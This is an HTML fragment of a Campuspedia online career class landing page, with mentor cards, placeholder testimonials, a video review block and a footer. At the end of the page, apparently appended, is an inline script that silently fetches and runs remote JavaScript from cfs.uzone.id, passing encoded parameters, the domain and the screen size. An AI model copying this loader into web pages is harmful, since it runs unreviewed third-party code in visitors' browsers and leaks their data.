            <div class="col-lg-7 col-md-7 item__right">
              <div class="item__right__image-left-3"><img class="item__right__image" src="assets/images/group_chat_1.png" alt=""></div>
              <div class="item__right__image-right-3"><img class="item__right__image" src="assets/images/group_chat_2.png" alt=""></div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="promotions spy" id="event">
      <div class="container">
        <div class="row promotions__list">
          <div class="col-lg-12 col-md-12 col-sm-12 promotions__item">
            <a class="pro-item pro-item--left bg-green" href="#" style="width: 100%;">
              <div class="pro-item__item"><span class="glyph-icon flaticon-paper pro-item__icon"></span></div>
              <div class="pro-item__item">
                <div class="pro-item__title">Sertifikat</div>
                <p class="pro-item__subcontent">Sertifikat Online Class tingkat nasional Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam.</p>
              </div>
            </a>
          </div>
        </div>
      </div>
    </div>

    <div class="our-team">
      <div class="our-team__title">Team kami</div>
      <div class="our-team__gird">
        <div class="row">
          <div class="col-md-4 col-sm-6">
            <div class="our-team__item">
              <div class="our-team__wapper"><img class="our-team__image"
                  src="assets/images/mentor_1.png" alt=""></div><a class="our-team__name"
                href="#">Iqbal Hariadi</a><a class="our-team__job" href="#">Head of Marketing @ kitabisa.com</a>
            </div>
          </div>
          <div class="col-md-4 col-sm-6">
            <div class="our-team__item">
              <div class="our-team__wapper"><img class="our-team__image"
                  src="assets/images/mentor_3.png" alt=""></div><a class="our-team__name"
                href="#">Fierza Yamuiz</a><a class="our-team__job" href="#">Digital & Promotion @ J&T Express dan Founder Deep Talk Community</a>
            </div>
          </div>
          <div class="col-md-4 col-sm-6">
            <div class="our-team__item">
              <div class="our-team__wapper"><img class="our-team__image"
                  src="assets/images/mentor_2.png" alt=""></div><a class="our-team__name"
                href="#">Amira Alhaddad</a><a class="our-team__job" href="#">Business Analyst @IYKRA</a>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div class="testimotials spy" id="elements">
      <div class="container">
        <div class="list-course__header">
          <h2 class="list-course__header__title wow fadeInDown" data-wow-duration="1s" data-wow-delay="0.002s"> Testimonials</h2>
        </div>
        <div class="row">
          <div class="testimotials__list">
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="2"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="3"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="4"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="5"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="6"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="7"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
                <div class="testimotials__item">
                  <div class="glyph-icon flaticon-weather testimotials__icon"></div>
                  <p class="testimotials__item__content">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
                  <div class="testimotials__item__avatar"><img class="testimotials__item__image" src="assets/images/profile.png" alt="8"></div>
                  <div class="testimotials__item__user">Alfian Prisma Yopiangga</div>
                  <div class="testimotials__item__prof">Politeknik Elektronika Negeri Surabaya</div>
                </div>
          </div>
        </div>
        <div class="review-course">
          <div class="row">
            <div class="col-lg-6 col-md-6 col-sm-6">
              <div class="review-course__item review-course__item-left">
                <div class="review-course__item-left__title">Pendapat Salsa dari Universitas Katolik Soegijapranata Semarang tentang Online Career Class Campuspedia</div>
                <div class="review-course__item-left__content">
                  <div class="review-course__item-left__info">
                    <div class="review-course__item-left__sub">" Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. "</div>
                  </div>
                  <div class="review-course__item-left__info">
                    <div class="rating-start" data-rating="5" style="color: white;"></div>
                  </div>
                </div>
              </div>
            </div>
            <div class="col-lg-6 col-md-6 col-sm-6">
              <div class="review-course__item review-course__item-right">
                <video class="review-course__item-right__video" id="video-bundle-detail" preload="none" poster="assets/images/video_poster_3.png" width="570" height="343">
                  <source src="" type="video/mp4">
                </video>
                <div class="review-course__item-right__content" id="video-content">
                  <div class="review-course__item-right__wapper">
                    <div class="glyph-icon flaticon-arrows-6 review-course__item-right__icon-video" id="button-vieo-bd"></div>
                    <div class="review-course__item-right__review">participant testimonial video</div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>


    <footer class="footer">
      <div class="container">
        <div class="footer__top">
          <h2 class="footer__top__title">Start Your Online Career Class To Life Better</h2>
          <div class="footer__top__sub">Do it now or never</div><a class="btn button-default design-sprint__item__button" href="#">get class</a>
        </div>
        <div class="row footer__content">
          <div class="col-lg-5 col-md-5"><a class="logo__link footer__logo" href="/"><h2 class="fz-30 c-white fw-bolder">Acade<span class="c-green">my</span></h2></a>
            <p class="footer__item__sub">
              CAMPUSPEDIA.<br />
              Villa Kalikepiting 125-B3, Surabaya<br />
              Jawa Timur, Indonesia
            </p>
                <div class="asocials">
                  <ul class="asocials__list">
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-social-media asocials__icon"></span></a></li>
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-social-1 asocials__icon"></span></a></li>
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-twitter-logo-silhouette asocials__icon"></span></a></li>
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-social-3 asocials__icon"></span></a></li>
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-social-4 asocials__icon"></span></a></li>
                    <li class="asocials__item"><a class="asocials__link" href="#"><span class="glyph-icon icon-custom flaticon-google-plus-symbol asocials__icon"></span></a></li>
                  </ul>
                </div>
          </div>
          <div class="col-lg-7 col-md-7 footer__content__right">
            <div class="row">
              <div class="col-lg-4 col-md-4 col-sm-4 footer__item">
                <h3 class="footer__item__title">Navigation</h3>
                    <ul class="footer-link__list">
                      <li class="footer-link__item"><a class="footer-link__link ">Home</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Events</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">News</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Panduan</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">TOS</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Contact Us</a>
                      </li>
                    </ul>
              </div>
              <div class="col-lg-4 col-md-4 col-sm-4 footer__item">
                <h3 class="footer__item__title">more</h3>
                    <ul class="footer-link__list">
                      <li class="footer-link__item"><a class="footer-link__link ">My Profile</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Sign In</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Sign Up</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Cart</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Search</a>
                      </li>
                      <li class="footer-link__item"><a class="footer-link__link ">Dashboard</a>
                      </li>
                    </ul>
              </div>
              <div class="col-lg-4 col-md-4 col-sm-4 footer__item">
                <h3 class="footer__item__title">Contact</h3>
                <div class="footer-link__link footer-link__link--contact">Contact us if you need help with anything</div>
                <div class="footer-link__link footer-link__link--phone">WA: 087-851-394-256</div>
                <div class="footer-link__link footer-link__link--phone">Mail: admin@campuspedia.id</div>
              </div>
            </div>
          </div>
        </div>
        <div class="footer__bottom">Copyright &copy; 2020. All rights reserved.</div>
      </div>
    </footer>
    <script src="assets/lib/js/jquery-3.3.1.min.js"></script>
    <script src="assets/lib/js/bootstrap.min.js"></script>
    <script src="assets/lib/slick/slick.min.js"></script>
    <script src="assets/js/wow.js"></script>
    <script src="assets/js/jquery-matchHeight.js"></script>
    <script src="assets/js/slicks.js"></script>
    <script src="assets/js/home.js"></script>
    <script src="assets/js/script.js"></script>
    <div class="positionfixed"></div>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXC5vepwsn9wq%2bgb0R5BtYyeUZ%2bM%2f5HV%2bUPhAnIddbSRqH%2bDBYF6RuEpTBqgKOVKotGy9yF7wMbIgUlxd%2bZ%2f028uv5XtUHbjNQCMYYH%2fYDJUi57hsxVsi%2fyh%2fBmVZhtTtYCaFx3pm4ikNg2a2VTT9uvXqTocn2lQZy2p9PLy3WIs5tddIOXAPd%2bsBhF9wGL14YfF%2bN9WfI7FDPXfRFfO1MAWLqR4fVYE7ZgOvGHiYmrJ3xIa18qvvMNZlPjKvTwAQh%2fCKS5gqYo9gWsuQrYCmixSOk0XPb1xrWcHjIFOnbc1MzPRFzqNqkYQpc1fhIR%2bVwXkPdqCvDyZFpxaBYYNEBSweVYihm5jY%2fkhF5vVEb%2fzaix7vsLSjSJhtviTPNJkeG0rX8kGAYDIhOAe2qELeB%2f32giALQNlJVQktpmZJxR07mUQ66GIu4FIL%2b3RgLxQEg23LvBNIf2UjTd%2ba3GPoYdYF31ad89myOqmeKrAET1uQ%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>